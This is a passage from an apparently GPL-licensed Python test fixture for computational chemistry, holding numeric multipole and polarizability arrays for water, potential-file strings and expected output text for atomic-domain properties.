[-0.64828157, 0.10331095, -0.00043311, 0.07188988, -0.47568608, 0.00023641, -0.03144256, -0.46921346, 0.00021729, -0.50819095],
[-0.64916749, 0.10338629, -0.00000024, 0.07234862, -0.47634698, 0.00000013, -0.03159569, -0.47003679, 0.00000011, -0.50936853],
[-0.64739723, 0.10323524, 0.00000000, 0.07143322, -0.47502412, 0.00000000, -0.03129003, -0.46838912, 0.00000000, -0.50701656],
],
#H2O
[
[ 0.00000000,-0.10023328, 0.00000000, 0.11470275, 0.53710687, 0.00000000, -0.43066796, 0.04316104, 0.00000000, 0.36285790],
[-0.00150139,-0.09934749, 0.00000000, 0.11398482, 0.53667874, 0.00000000, -0.43012670, 0.04298387, 0.00000000, 0.36257240],
[ 0.00150826,-0.10112008, 0.00000000, 0.11541676, 0.53753350, 0.00000000, -0.43120982, 0.04333795, 0.00000000, 0.36314186],
[-0.00000130,-0.10023170, 0.00125018, 0.11470018, 0.53710620, 0.00006107, -0.43066732, 0.04316017, 0.00015952, 0.36285728],
[ 0.00000101,-0.10023249, -0.00125247, 0.11470042, 0.53710716, -0.00006135, -0.43066838, 0.04316018, -0.00015966, 0.36285788],
[ 0.00088692,-0.10059268, -0.00000064, 0.11590322, 0.53754715, 0.00000006, -0.43071206, 0.04334198, -0.00000015, 0.36330053],
[-0.00088334,-0.09987383, 0.00000000, 0.11350091, 0.53666602, 0.00000000, -0.43062352, 0.04297910, 0.00000000, 0.36241326],
],
#H2H1
[
[ 0.00000000, 0.00000000, 0.00000000, -0.00378789, 0.00148694, 0.00000000, 0.00000000, 0.00599079, 0.00000000, 0.01223822],
[ 0.00000000, 0.00004089, 0.00000000, -0.00378786, 0.00148338, 0.00000000, -0.00004858, 0.00599281, 0.00000000, 0.01224094],
[ 0.00000000,-0.00004067, 0.00000000, -0.00378785, 0.00148341, 0.00000000, 0.00004861, 0.00599277, 0.00000000, 0.01224093],
[ 0.00000000,-0.00000033, -0.00001707, -0.00378763, 0.00149017, 0.00000000, 0.00000001, 0.00599114, -0.00001229, 0.01223979],
[ 0.00000000, 0.00000000, 0.00001717, -0.00378763, 0.00149019, 0.00000000, 0.00000000, 0.00599114, 0.00001242, 0.01223980],
[ 0.00000000, 0.00000000, 0.00000000, -0.00378978, 0.00141897, 0.00000000, 0.00000000, 0.00590445, 0.00000002, 0.01210376],
[ 0.00000000, 0.00000000, 0.00000000, -0.00378577, 0.00155694, 0.00000000, 0.00000000, 0.00607799, 0.00000000, 0.01237393],
],
#H2
[
[-0.64828057,-0.10330994, 0.00000000, 0.07188960, -0.47568174, 0.00000000, 0.03144252, -0.46920879, 0.00000000, -0.50818752],
[-0.64677918,-0.10273369, 0.00000000, 0.07173576, -0.47408411, 0.00000000, 0.03134408, -0.46768486, 0.00000000, -0.50674986],
[-0.64978883,-0.10389230, 0.00000000, 0.07204446, -0.47729439, 0.00000000, 0.03154159, -0.47074717, 0.00000000, -0.50963754],
[-0.64827927,-0.10331022, 0.00043313, 0.07188947, -0.47568340, 0.00023642, 0.03144242, -0.46921057, -0.00021727, -0.50818804],
[-0.64828158,-0.10331095, -0.00043311, 0.07188988, -0.47568609, -0.00023641, 0.03144256, -0.46921348, 0.00021729, -0.50819097],
[-0.64916749,-0.10338629, -0.00000024, 0.07234862, -0.47634698, -0.00000013, 0.03159569, -0.47003679, 0.00000011, -0.50936853],
[-0.64739723,-0.10323524, 0.00000000, 0.07143322, -0.47502412, 0.00000000, 0.03129003, -0.46838912, 0.00000000, -0.50701656]
]
])
Am = init([
[8.186766009140, 0., 0.],
[0., 5.102747935447, 0.],
[0., 0., 6.565131856389]
])
Amw = init([
[11.98694996213, 0., 0.],
[0., 4.403583657738, 0.],
[0., 0., 2.835142058626]
])
R = [
[ 0.00000, 0.00000, 0.69801],
[-1.48150, 0.00000, -0.34901],
[ 1.48150, 0.00000, -0.34901]
]
Qtot = -10.0
Q = rMP[0, 0, (0, 2, 5)]
D = rMP[1:4, 0, :]
QU = rMP[4:, 0, :]
dQa = rMP[0, :, (0,2,5)]
dQab = rMP[0, :, (1, 3, 4)]
#These are string data for testing potential file
PAn0 = """AU
3 -1 0 1
1 0.000 0.000 0.698
1 -1.481 0.000 -0.349
1 1.481 0.000 -0.349
"""
PA00 = """AU
3 0 0 1
1 0.000 0.000 0.698 -0.703
1 -1.481 0.000 -0.349 0.352
1 1.481 0.000 -0.349 0.352
"""
PA10 = """AU
3 1 0 1
1 0.000 0.000 0.698 -0.703 -0.000 0.000 -0.284
1 -1.481 0.000 -0.349 0.352 0.153 0.000 0.127
1 1.481 0.000 -0.349 0.352 -0.153 0.000 0.127
"""
PA20 = """AU
3 2 0 1
1 0.000 0.000 0.698 -0.703 -0.000 0.000 -0.284 -3.293 0.000 -0.000 -4.543 -0.000 -4.005
1 -1.481 0.000 -0.349 0.352 0.153 0.000 0.127 -0.132 0.000 0.250 -0.445 0.000 -0.261
1 1.481 0.000 -0.349 0.352 -0.153 0.000 0.127 -0.132 -0.000 -0.250 -0.445 0.000 -0.261
"""
PA21 = """AU
3 2 1 1
1 0.000 0.000 0.698 -0.703 -0.000 0.000 -0.284 -3.293 0.000 -0.000 -4.543 -0.000 -4.005 3.466
1 -1.481 0.000 -0.349 0.352 0.153 0.000 0.127 -0.132 0.000 0.250 -0.445 0.000 -0.261 1.576
1 1.481 0.000 -0.349 0.352 -0.153 0.000 0.127 -0.132 -0.000 -0.250 -0.445 0.000 -0.261 1.576
"""
PA22 = """AU
3 2 2 1
1 0.000 0.000 0.698 -0.703 -0.000 0.000 -0.284 -3.293 0.000 -0.000 -4.543 -0.000 -4.005 3.875 -0.000 -0.000 3.000 -0.000 3.524
1 -1.481 0.000 -0.349 0.352 0.153 0.000 0.127 -0.132 0.000 0.250 -0.445 0.000 -0.261 2.156 -0.000 1.106 1.051 -0.000 1.520
1 1.481 0.000 -0.349 0.352 -0.153 0.000 0.127 -0.132 -0.000 -0.250 -0.445 0.000 -0.261 2.156 -0.000 -1.106 1.051 -0.000 1.520
"""
OUTPUT_n0_1 = """\
---------------
Atomic domain 1
---------------
Domain center: 0.00000 0.00000 0.69801
"""
OUTPUT_00_1 = OUTPUT_n0_1 + """\
Nuclear charge: 8.00000
Electronic charge: -8.70344
Total charge: -0.70344
"""
OUTPUT_10_1 = OUTPUT_00_1 + """\
Electronic dipole -0.00000 0.00000 -0.28357
"""
OUTPUT_20_1 = OUTPUT_10_1 + """\
Electronic quadrupole -3.29254 0.00000 -0.00000 -4.54317 0.00000 -4.00466
"""
OUTPUT_01_1 = OUTPUT_00_1 + """\
Isotropic polarizablity (w=0) 3.46639
"""
OUTPUT_02_1 = OUTPUT_00_1 + """\
Electronic polarizability (w=0) 3.87468 -0.00000 3.00027 -0.00000 -0.00000 3.52422
"""
| gpl-3.0 | 7,379,008,257,670,152,000 | 48.484848 | 191 | 0.56513 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.